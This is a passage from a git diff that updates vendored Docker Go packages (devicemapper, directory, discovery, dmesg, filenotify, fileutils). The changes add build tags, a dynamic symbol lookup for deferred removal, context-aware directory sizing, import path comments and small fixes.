 func dmUdevGetSyncSupportFct() int {
@@ -226,10 +231,6 @@ func dmCookieSupportedFct() int {
 	return int(C.dm_cookie_supported())
 }
 
-func dmLogInitVerboseFct(level int) {
-	C.dm_log_init_verbose(C.int(level))
-}
-
 func logWithErrnoInitFct() {
 	C.log_with_errno_init()
 }
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go
new file mode 100644
index 0000000000..8a1098f7d5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic.go
@@ -0,0 +1,6 @@
+// +build linux,cgo,!static_build
+
+package devicemapper // import "github.com/docker/docker/pkg/devicemapper"
+
+// #cgo pkg-config: devmapper
+import "C"
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_deferred_remove.go
similarity index 75%
rename from vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go
rename to vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_deferred_remove.go
index dc361eab76..3d3021c4e1 100644
--- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_deferred_remove.go
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_deferred_remove.go
@@ -1,14 +1,15 @@
-// +build linux,!libdm_no_deferred_remove
+// +build linux,cgo,!static_build
+// +build !libdm_dlsym_deferred_remove,!libdm_no_deferred_remove
 
-package devicemapper
+package devicemapper // import "github.com/docker/docker/pkg/devicemapper"
 
 /*
-#cgo LDFLAGS: -L. -ldevmapper
 #include <libdevmapper.h>
 */
 import "C"
 
-// LibraryDeferredRemovalSupport is supported when statically linked.
+// LibraryDeferredRemovalSupport tells if the feature is supported by the
+// current Docker invocation.
 const LibraryDeferredRemovalSupport = true
 
 func dmTaskDeferredRemoveFct(task *cdmTask) int {
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go
new file mode 100644
index 0000000000..5dfb369f1f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_dynamic_dlsym_deferred_remove.go
@@ -0,0 +1,128 @@
+// +build linux,cgo,!static_build
+// +build libdm_dlsym_deferred_remove,!libdm_no_deferred_remove
+
+package devicemapper
+
+/*
+#cgo LDFLAGS: -ldl
+#include <stdlib.h>
+#include <dlfcn.h>
+#include <libdevmapper.h>
+
+// Yes, I know this looks scary. In order to be able to fill our own internal
+// dm_info with deferred_remove we need to have a struct definition that is
+// correct (regardless of the version of libdm that was used to compile it). To
+// this end, we define struct_backport_dm_info. This code comes from lvm2, and
+// I have verified that the structure has only ever had elements *appended* to
+// it (since 2001).
+//
+// It is also important that this structure be _larger_ than the dm_info that
+// libdevmapper expected. Otherwise libdm might try to write to memory it
+// shouldn't (they don't have a "known size" API).
+struct backport_dm_info {
+	int exists;
+	int suspended;
+	int live_table;
+	int inactive_table;
+	int32_t open_count;
+	uint32_t event_nr;
+	uint32_t major;
+	uint32_t minor;
+	int read_only;
+
+	int32_t target_count;
+
+	int deferred_remove;
+	int internal_suspend;
+
+	// Padding, purely for our own safety. This is to avoid cases where libdm
+	// was updated underneath us and we call into dm_task_get_info() with too
+	// small of a buffer.
+	char _[512];
+};
+
+// We have to wrap this in CGo, because Go really doesn't like function pointers.
+int call_dm_task_deferred_remove(void *fn, struct dm_task *task)
+{
+	int (*_dm_task_deferred_remove)(struct dm_task *task) = fn;
+	return _dm_task_deferred_remove(task);
+}
+*/
+import "C"
+
+import (
+	"unsafe"
+
+	"github.com/sirupsen/logrus"
+)
+
+// dm_task_deferred_remove is not supported by all distributions, due to
+// out-dated versions of devicemapper. However, in the case where the
+// devicemapper library was updated without rebuilding Docker (which can happen
+// in some distributions) then we should attempt to dynamically load the
+// relevant object rather than try to link to it.
+
+// dmTaskDeferredRemoveFct is a "bound" version of dm_task_deferred_remove.
+// It is nil if dm_task_deferred_remove was not found in the libdevmapper that
+// is currently loaded.
+var dmTaskDeferredRemovePtr unsafe.Pointer
+
+// LibraryDeferredRemovalSupport tells if the feature is supported by the
+// current Docker invocation. This value is fixed during init.
+var LibraryDeferredRemovalSupport bool
+
+func init() {
+	// Clear any errors.
+	var err *C.char
+	C.dlerror()
+
+	// The symbol we want to fetch.
+	symName := C.CString("dm_task_deferred_remove")
+	defer C.free(unsafe.Pointer(symName))
+
+	// See if we can find dm_task_deferred_remove. Since we already are linked
+	// to libdevmapper, we can search our own address space (rather than trying
+	// to guess what libdevmapper is called). We use NULL here, as RTLD_DEFAULT
+	// is not available in CGO (even if you set _GNU_SOURCE for some reason).
+	// The semantics are identical on glibc.
+	sym := C.dlsym(nil, symName)
+	err = C.dlerror()
+	if err != nil {
+		logrus.Debugf("devmapper: could not load dm_task_deferred_remove: %s", C.GoString(err))
+		return
+	}
+
+	logrus.Debugf("devmapper: found dm_task_deferred_remove at %x", uintptr(sym))
+	dmTaskDeferredRemovePtr = sym
+	LibraryDeferredRemovalSupport = true
+}
+
+func dmTaskDeferredRemoveFct(task *cdmTask) int {
+	sym := dmTaskDeferredRemovePtr
+	if sym == nil || !LibraryDeferredRemovalSupport {
+		return -1
+	}
+	return int(C.call_dm_task_deferred_remove(sym, (*C.struct_dm_task)(task)))
+}
+
+func dmTaskGetInfoWithDeferredFct(task *cdmTask, info *Info) int {
+	if !LibraryDeferredRemovalSupport {
+		return -1
+	}
+
+	Cinfo := C.struct_backport_dm_info{}
+	defer func() {
+		info.Exists = int(Cinfo.exists)
+		info.Suspended = int(Cinfo.suspended)
+		info.LiveTable = int(Cinfo.live_table)
+		info.InactiveTable = int(Cinfo.inactive_table)
+		info.OpenCount = int32(Cinfo.open_count)
+		info.EventNr = uint32(Cinfo.event_nr)
+		info.Major = uint32(Cinfo.major)
+		info.Minor = uint32(Cinfo.minor)
+		info.ReadOnly = int(Cinfo.read_only)
+		info.TargetCount = int32(Cinfo.target_count)
+		info.DeferredRemove = int(Cinfo.deferred_remove)
+	}()
+	return int(C.dm_task_get_info((*C.struct_dm_task)(task), (*C.struct_dm_info)(unsafe.Pointer(&Cinfo))))
+}
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go
index 8249ccf854..8889f0f46f 100644
--- a/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/devmapper_wrapper_no_deferred_remove.go
@@ -1,8 +1,10 @@
-// +build linux,libdm_no_deferred_remove
+// +build linux,cgo
+// +build !libdm_dlsym_deferred_remove,libdm_no_deferred_remove
 
-package devicemapper
+package devicemapper // import "github.com/docker/docker/pkg/devicemapper"
 
-// LibraryDeferredRemovalSupport is not supported when statically linked.
+// LibraryDeferredRemovalSupport tells if the feature is supported by the
+// current Docker invocation.
 const LibraryDeferredRemovalSupport = false
 
 func dmTaskDeferredRemoveFct(task *cdmTask) int {
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go
index 581b57eb86..ec5a0b33ba 100644
--- a/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/ioctl.go
@@ -1,15 +1,16 @@
-// +build linux
+// +build linux,cgo
 
-package devicemapper
+package devicemapper // import "github.com/docker/docker/pkg/devicemapper"
 
 import (
-	"syscall"
 	"unsafe"
+
+	"golang.org/x/sys/unix"
 )
 
 func ioctlBlkGetSize64(fd uintptr) (int64, error) {
 	var size int64
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkGetSize64, uintptr(unsafe.Pointer(&size))); err != 0 {
+	if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, BlkGetSize64, uintptr(unsafe.Pointer(&size))); err != 0 {
 		return 0, err
 	}
 	return size, nil
@@ -20,7 +21,7 @@ func ioctlBlkDiscard(fd uintptr, offset, length uint64) error {
 	r[0] = offset
 	r[1] = length
 
-	if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, BlkDiscard, uintptr(unsafe.Pointer(&r[0]))); err != 0 {
+	if _, _, err := unix.Syscall(unix.SYS_IOCTL, fd, BlkDiscard, uintptr(unsafe.Pointer(&r[0]))); err != 0 {
 		return err
 	}
 	return nil
diff --git a/vendor/github.com/docker/docker/pkg/devicemapper/log.go b/vendor/github.com/docker/docker/pkg/devicemapper/log.go
index cee5e54549..dd330ba4f8 100644
--- a/vendor/github.com/docker/docker/pkg/devicemapper/log.go
+++ b/vendor/github.com/docker/docker/pkg/devicemapper/log.go
@@ -1,4 +1,4 @@
-package devicemapper
+package devicemapper // import "github.com/docker/docker/pkg/devicemapper"
 
 // definitions from lvm2 lib/log/log.h
 const (
diff --git a/vendor/github.com/docker/docker/pkg/directory/directory.go b/vendor/github.com/docker/docker/pkg/directory/directory.go
index 1715ef45d9..51d4a6ea22 100644
--- a/vendor/github.com/docker/docker/pkg/directory/directory.go
+++ b/vendor/github.com/docker/docker/pkg/directory/directory.go
@@ -1,4 +1,4 @@
-package directory
+package directory // import "github.com/docker/docker/pkg/directory"
 
 import (
 	"io/ioutil"
diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_test.go b/vendor/github.com/docker/docker/pkg/directory/directory_test.go
index 2b7a4657be..ea62bdf236 100644
--- a/vendor/github.com/docker/docker/pkg/directory/directory_test.go
+++ b/vendor/github.com/docker/docker/pkg/directory/directory_test.go
@@ -1,6 +1,7 @@
-package directory
+package directory // import "github.com/docker/docker/pkg/directory"
 
 import (
+	"context"
 	"io/ioutil"
 	"os"
 	"path/filepath"
@@ -18,7 +19,7 @@ func TestSizeEmpty(t *testing.T) {
 	}
 
 	var size int64
-	if size, _ = Size(dir); size != 0 {
+	if size, _ = Size(context.Background(), dir); size != 0 {
 		t.Fatalf("empty directory has size: %d", size)
 	}
 }
@@ -37,7 +38,7 @@ func TestSizeEmptyFile(t *testing.T) {
 	}
 
 	var size int64
-	if size, _ = Size(file.Name()); size != 0 {
+	if size, _ = Size(context.Background(), file.Name()); size != 0 {
 		t.Fatalf("directory with one file has size: %d", size)
 	}
 }
@@ -59,7 +60,7 @@ func TestSizeNonemptyFile(t *testing.T) {
 	file.Write(d)
 
 	var size int64
-	if size, _ = Size(file.Name()); size != 5 {
+	if size, _ = Size(context.Background(), file.Name()); size != 5 {
 		t.Fatalf("directory with one 5-byte file has size: %d", size)
 	}
 }
@@ -76,7 +77,7 @@ func TestSizeNestedDirectoryEmpty(t *testing.T) {
 	}
 
 	var size int64
-	if size, _ = Size(dir); size != 0 {
+	if size, _ = Size(context.Background(), dir); size != 0 {
 		t.Fatalf("directory with one empty directory has size: %d", size)
 	}
 }
@@ -101,7 +102,7 @@ func TestSizeFileAndNestedDirectoryEmpty(t *testing.T) {
 	file.Write(d)
 
 	var size int64
-	if size, _ = Size(dir); size != 6 {
+	if size, _ = Size(context.Background(), dir); size != 6 {
 		t.Fatalf("directory with 6-byte file and empty directory has size: %d", size)
 	}
 }
@@ -134,7 +135,7 @@ func TestSizeFileAndNestedDirectoryNonempty(t *testing.T) {
 	nestedFile.Write(nestedData)
 
 	var size int64
-	if size, _ = Size(dir); size != 12 {
+	if size, _ = Size(context.Background(), dir); size != 12 {
 		t.Fatalf("directory with 6-byte file and nested directory with 6-byte file has size: %d", size)
 	}
 }
@@ -186,7 +187,7 @@ func TestMoveToSubdir(t *testing.T) {
 
 // Test a non-existing directory
 func TestSizeNonExistingDirectory(t *testing.T) {
-	if _, err := Size("/thisdirectoryshouldnotexist/TestSizeNonExistingDirectory"); err == nil {
+	if _, err := Size(context.Background(), "/thisdirectoryshouldnotexist/TestSizeNonExistingDirectory"); err == nil {
 		t.Fatalf("error is expected")
 	}
 }
diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_unix.go b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go
index 397251bdb8..f56dd7a8f9 100644
--- a/vendor/github.com/docker/docker/pkg/directory/directory_unix.go
+++ b/vendor/github.com/docker/docker/pkg/directory/directory_unix.go
@@ -1,15 +1,16 @@
-// +build linux freebsd solaris
+// +build linux freebsd darwin
 
-package directory
+package directory // import "github.com/docker/docker/pkg/directory"
 
 import (
+	"context"
 	"os"
 	"path/filepath"
 	"syscall"
 )
 
 // Size walks a directory tree and returns its total size in bytes.
-func Size(dir string) (size int64, err error) {
+func Size(ctx context.Context, dir string) (size int64, err error) {
 	data := make(map[uint64]struct{})
 	err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error {
 		if err != nil {
@@ -20,6 +21,11 @@ func Size(dir string) (size int64, err error) {
 			}
 			return err
 		}
+		select {
+		case <-ctx.Done():
+			return ctx.Err()
+		default:
+		}
 
 		// Ignore directory sizes
 		if fileInfo == nil {
@@ -34,11 +40,11 @@ func Size(dir string) (size int64, err error) {
 		// Check inode to handle hard links correctly
 		inode := fileInfo.Sys().(*syscall.Stat_t).Ino
 		// inode is not a uint64 on all platforms. Cast it to avoid issues.
-		if _, exists := data[uint64(inode)]; exists {
+		if _, exists := data[inode]; exists {
 			return nil
 		}
 		// inode is not a uint64 on all platforms. Cast it to avoid issues.
-		data[uint64(inode)] = struct{}{}
+		data[inode] = struct{}{}
 
 		size += s
 
diff --git a/vendor/github.com/docker/docker/pkg/directory/directory_windows.go b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go
index 6fb0917c4c..f07f241880 100644
--- a/vendor/github.com/docker/docker/pkg/directory/directory_windows.go
+++ b/vendor/github.com/docker/docker/pkg/directory/directory_windows.go
@@ -1,14 +1,13 @@
-// +build windows
-
-package directory
+package directory // import "github.com/docker/docker/pkg/directory"
 
 import (
+	"context"
 	"os"
 	"path/filepath"
 )
 
 // Size walks a directory tree and returns its total size in bytes.
-func Size(dir string) (size int64, err error) {
+func Size(ctx context.Context, dir string) (size int64, err error) {
 	err = filepath.Walk(dir, func(d string, fileInfo os.FileInfo, err error) error {
 		if err != nil {
 			// if dir does not exist, Size() returns the error.
@@ -19,6 +18,12 @@ func Size(dir string) (size int64, err error) {
 			return err
 		}
 
+		select {
+		case <-ctx.Done():
+			return ctx.Err()
+		default:
+		}
+
 		// Ignore directory sizes
 		if fileInfo == nil {
 			return nil
diff --git a/vendor/github.com/docker/docker/pkg/discovery/README.md b/vendor/github.com/docker/docker/pkg/discovery/README.md
index 39777c2171..d8ed9ce71e 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/README.md
+++ b/vendor/github.com/docker/docker/pkg/discovery/README.md
@@ -17,7 +17,7 @@ the address Docker uses to advertise the node using the `--cluster-advertise`
 flag.
 
 ```bash
-$ docker daemon -H=<node_ip:2376> --cluster-advertise=<node_ip:2376> --cluster-store etcd://<etcd_ip1>,<etcd_ip2>/<path>
+$ dockerd -H=<node_ip:2376> --cluster-advertise=<node_ip:2376> --cluster-store etcd://<etcd_ip1>,<etcd_ip2>/<path>
 ```
 
 ### Using consul
@@ -27,7 +27,7 @@ the address Docker uses to advertise the node using the `--cluster-advertise`
 flag.
 
 ```bash
-$ docker daemon -H=<node_ip:2376> --cluster-advertise=<node_ip:2376> --cluster-store consul://<consul_ip>/<path>
+$ dockerd -H=<node_ip:2376> --cluster-advertise=<node_ip:2376> --cluster-store consul://<consul_ip>/<path>
 ```
 
 ### Using zookeeper
@@ -37,5 +37,5 @@ the address Docker uses to advertise the node using the `--cluster-advertise`
 flag.
 
 ```bash
-$ docker daemon -H=<node_ip:2376> --cluster-advertise=<node_ip:2376> --cluster-store zk://<zk_addr1>,<zk_addr2>/<path>
+$ dockerd -H=<node_ip:2376> --cluster-advertise=<node_ip:2376> --cluster-store zk://<zk_addr1>,<zk_addr2>/<path>
 ```
diff --git a/vendor/github.com/docker/docker/pkg/discovery/backends.go b/vendor/github.com/docker/docker/pkg/discovery/backends.go
index 2eab550e29..1d038285ad 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/backends.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/backends.go
@@ -1,4 +1,4 @@
-package discovery
+package discovery // import "github.com/docker/docker/pkg/discovery"
 
 import (
 	"fmt"
@@ -6,7 +6,7 @@ import (
 	"strings"
 	"time"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 )
 
 var (
diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery.go b/vendor/github.com/docker/docker/pkg/discovery/discovery.go
index ca7f587458..828c5ca488 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/discovery.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/discovery.go
@@ -1,4 +1,4 @@
-package discovery
+package discovery // import "github.com/docker/docker/pkg/discovery"
 
 import (
 	"errors"
diff --git a/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go
index 6084f3ef0d..ffe8cb9122 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/discovery_test.go
@@ -1,4 +1,4 @@
-package discovery
+package discovery // import "github.com/docker/docker/pkg/discovery"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/pkg/discovery/entry.go b/vendor/github.com/docker/docker/pkg/discovery/entry.go
index ce23bbf89b..be06c75787 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/entry.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/entry.go
@@ -1,4 +1,4 @@
-package discovery
+package discovery // import "github.com/docker/docker/pkg/discovery"
 
 import "net"
 
diff --git a/vendor/github.com/docker/docker/pkg/discovery/file/file.go b/vendor/github.com/docker/docker/pkg/discovery/file/file.go
index 2b8e27b754..1494af485f 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/file/file.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/file/file.go
@@ -1,4 +1,4 @@
-package file
+package file // import "github.com/docker/docker/pkg/discovery/file"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go
index 667f00ba0d..010e941c2a 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/file/file_test.go
@@ -1,4 +1,4 @@
-package file
+package file // import "github.com/docker/docker/pkg/discovery/file"
 
 import (
 	"io/ioutil"
diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator.go b/vendor/github.com/docker/docker/pkg/discovery/generator.go
index d22298298f..788015fe23 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/generator.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/generator.go
@@ -1,4 +1,4 @@
-package discovery
+package discovery // import "github.com/docker/docker/pkg/discovery"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/discovery/generator_test.go b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go
index 6281c46665..5126df576e 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/generator_test.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/generator_test.go
@@ -1,4 +1,4 @@
-package discovery
+package discovery // import "github.com/docker/docker/pkg/discovery"
 
 import (
 	"github.com/go-check/check"
diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go
index 77eee7d454..30fe6714c8 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/kv/kv.go
@@ -1,4 +1,4 @@
-package kv
+package kv // import "github.com/docker/docker/pkg/discovery/kv"
 
 import (
 	"fmt"
@@ -6,7 +6,6 @@ import (
 	"strings"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/discovery"
 	"github.com/docker/go-connections/tlsconfig"
 	"github.com/docker/libkv"
@@ -14,6 +13,7 @@ import (
 	"github.com/docker/libkv/store/consul"
 	"github.com/docker/libkv/store/etcd"
 	"github.com/docker/libkv/store/zookeeper"
+	"github.com/sirupsen/logrus"
 )
 
 const (
diff --git a/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go
index dab3939dd0..79fd91c61f 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/kv/kv_test.go
@@ -1,4 +1,4 @@
-package kv
+package kv // import "github.com/docker/docker/pkg/discovery/kv"
 
 import (
 	"errors"
@@ -11,7 +11,6 @@ import (
 	"github.com/docker/docker/pkg/discovery"
 	"github.com/docker/libkv"
 	"github.com/docker/libkv/store"
-
 	"github.com/go-check/check"
 )
 
@@ -130,7 +129,6 @@ func (s *Mock) AtomicDelete(key string, previous *store.KVPair) (bool, error) {
 
 // Close mock
 func (s *Mock) Close() {
-	return
 }
 
 func (ds *DiscoverySuite) TestInitializeWithCerts(c *check.C) {
diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go
index ba8b1f55f3..81f973e285 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory.go
@@ -1,4 +1,4 @@
-package memory
+package memory // import "github.com/docker/docker/pkg/discovery/memory"
 
 import (
 	"sync"
diff --git a/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go
index c2da0a068e..1d937f0160 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/memory/memory_test.go
@@ -1,4 +1,4 @@
-package memory
+package memory // import "github.com/docker/docker/pkg/discovery/memory"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go
index c0e3c07b22..b1d45aa2e6 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes.go
@@ -1,4 +1,4 @@
-package nodes
+package nodes // import "github.com/docker/docker/pkg/discovery/nodes"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go
index e26568cf54..f9b43ab00b 100644
--- a/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go
+++ b/vendor/github.com/docker/docker/pkg/discovery/nodes/nodes_test.go
@@ -1,4 +1,4 @@
-package nodes
+package nodes // import "github.com/docker/docker/pkg/discovery/nodes"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go
new file mode 100644
index 0000000000..bc71b5b31f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux.go
@@ -0,0 +1,18 @@
+package dmesg // import "github.com/docker/docker/pkg/dmesg"
+
+import (
+	"unsafe"
+
+	"golang.org/x/sys/unix"
+)
+
+// Dmesg returns last messages from the kernel log, up to size bytes
+func Dmesg(size int) []byte {
+	t := uintptr(3) // SYSLOG_ACTION_READ_ALL
+	b := make([]byte, size)
+	amt, _, err := unix.Syscall(unix.SYS_SYSLOG, t, uintptr(unsafe.Pointer(&b[0])), uintptr(len(b)))
+	if err != 0 {
+		return []byte{}
+	}
+	return b[:amt]
+}
diff --git a/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go
new file mode 100644
index 0000000000..cc20ff9165
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/dmesg/dmesg_linux_test.go
@@ -0,0 +1,9 @@
+package dmesg // import "github.com/docker/docker/pkg/dmesg"
+
+import (
+	"testing"
+)
+
+func TestDmesg(t *testing.T) {
+	t.Logf("dmesg output follows:\n%v", string(Dmesg(512)))
+}
diff --git a/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go
index 7a81cbda95..8b6cb56f17 100644
--- a/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go
+++ b/vendor/github.com/docker/docker/pkg/filenotify/filenotify.go
@@ -1,7 +1,7 @@
 // Package filenotify provides a mechanism for watching file(s) for changes.
 // Generally leans on fsnotify, but provides a poll-based notifier which fsnotify does not support.
 // These are wrapped up in a common interface so that either can be used interchangeably in your code.
-package filenotify
+package filenotify // import "github.com/docker/docker/pkg/filenotify"
 
 import "github.com/fsnotify/fsnotify"
 
diff --git a/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go
index 5d08a997a0..5a737d6530 100644
--- a/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go
+++ b/vendor/github.com/docker/docker/pkg/filenotify/fsnotify.go
@@ -1,8 +1,8 @@
-package filenotify
+package filenotify // import "github.com/docker/docker/pkg/filenotify"
 
 import "github.com/fsnotify/fsnotify"
 
-// fsNotifyWatcher wraps the fsnotify package to satisfy the FileNotifer interface
+// fsNotifyWatcher wraps the fsnotify package to satisfy the FileNotifier interface
 type fsNotifyWatcher struct {
 	*fsnotify.Watcher
 }
diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller.go b/vendor/github.com/docker/docker/pkg/filenotify/poller.go
index dc5ccd0f7f..22f1897034 100644
--- a/vendor/github.com/docker/docker/pkg/filenotify/poller.go
+++ b/vendor/github.com/docker/docker/pkg/filenotify/poller.go
@@ -1,4 +1,4 @@
-package filenotify
+package filenotify // import "github.com/docker/docker/pkg/filenotify"
 
 import (
 	"errors"
@@ -7,7 +7,7 @@ import (
 	"sync"
 	"time"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 
 	"github.com/fsnotify/fsnotify"
 )
@@ -15,8 +15,8 @@ import (
 var (
 	// errPollerClosed is returned when the poller is closed
 	errPollerClosed = errors.New("poller is closed")
-	// errNoSuchPoller is returned when trying to remove a watch that doesn't exist
-	errNoSuchWatch = errors.New("poller does not exist")
+	// errNoSuchWatch is returned when trying to remove a watch that doesn't exist
+	errNoSuchWatch = errors.New("watch does not exist")
 )
 
 // watchWaitTime is the time to wait between file poll loops
@@ -44,7 +44,7 @@ func (w *filePoller) Add(name string) error {
 	w.mu.Lock()
 	defer w.mu.Unlock()
 
-	if w.closed == true {
+	if w.closed {
 		return errPollerClosed
 	}
 
@@ -78,7 +78,7 @@ func (w *filePoller) Remove(name string) error {
 }
 
 func (w *filePoller) remove(name string) error {
-	if w.closed == true {
+	if w.closed {
 		return errPollerClosed
 	}
 
diff --git a/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go
index b4c7825112..a46b60d94f 100644
--- a/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go
+++ b/vendor/github.com/docker/docker/pkg/filenotify/poller_test.go
@@ -1,4 +1,4 @@
-package filenotify
+package filenotify // import "github.com/docker/docker/pkg/filenotify"
 
 import (
 	"fmt"
@@ -61,7 +61,7 @@ func TestPollerEvent(t *testing.T) {
 	default:
 	}
 
-	if err := ioutil.WriteFile(f.Name(), []byte("hello"), 644); err != nil {
+	if err := ioutil.WriteFile(f.Name(), []byte("hello"), 0644); err != nil {
 		t.Fatal(err)
 	}
 	if err := assertEvent(w, fsnotify.Write); err != nil {
@@ -108,7 +108,7 @@ func assertEvent(w FileWatcher, eType fsnotify.Op) error {
 	select {
 	case e := <-w.Events():
 		if e.Op != eType {
-			err = fmt.Errorf("got wrong event type, expected %q: %v", eType, e)
+			err = fmt.Errorf("got wrong event type, expected %q: %v", eType, e.Op)
 		}
 	case e := <-w.Errors():
 		err = fmt.Errorf("got unexpected error waiting for events %v: %v", eType, e)
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go
index c63ae75ce8..28cad499aa 100644
--- a/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go
+++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils.go
@@ -1,4 +1,4 @@
-package fileutils
+package fileutils // import "github.com/docker/docker/pkg/fileutils"
 
 import (
 	"errors"
@@ -10,101 +10,77 @@ import (
 	"strings"
 	"text/scanner"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 )
 
-// exclusion returns true if the specified pattern is an exclusion
-func exclusion(pattern string) bool {
-	return pattern[0] == '!'
+// PatternMatcher allows checking paths against a list of patterns
+type PatternMatcher struct {
+	patterns   []*Pattern
+	exclusions bool
 }
 
-// empty returns true if the specified pattern is empty
-func empty(pattern string) bool {
-	return pattern == ""
-}
-
-// CleanPatterns takes a slice of patterns returns a new
-// slice of patterns cleaned with filepath.Clean, stripped
-// of any empty patterns and lets the caller know whether the
-// slice contains any exception patterns (prefixed with !).
-func CleanPatterns(patterns []string) ([]string, [][]string, bool, error) {
-	// Loop over exclusion patterns and:
-	// 1. Clean them up.
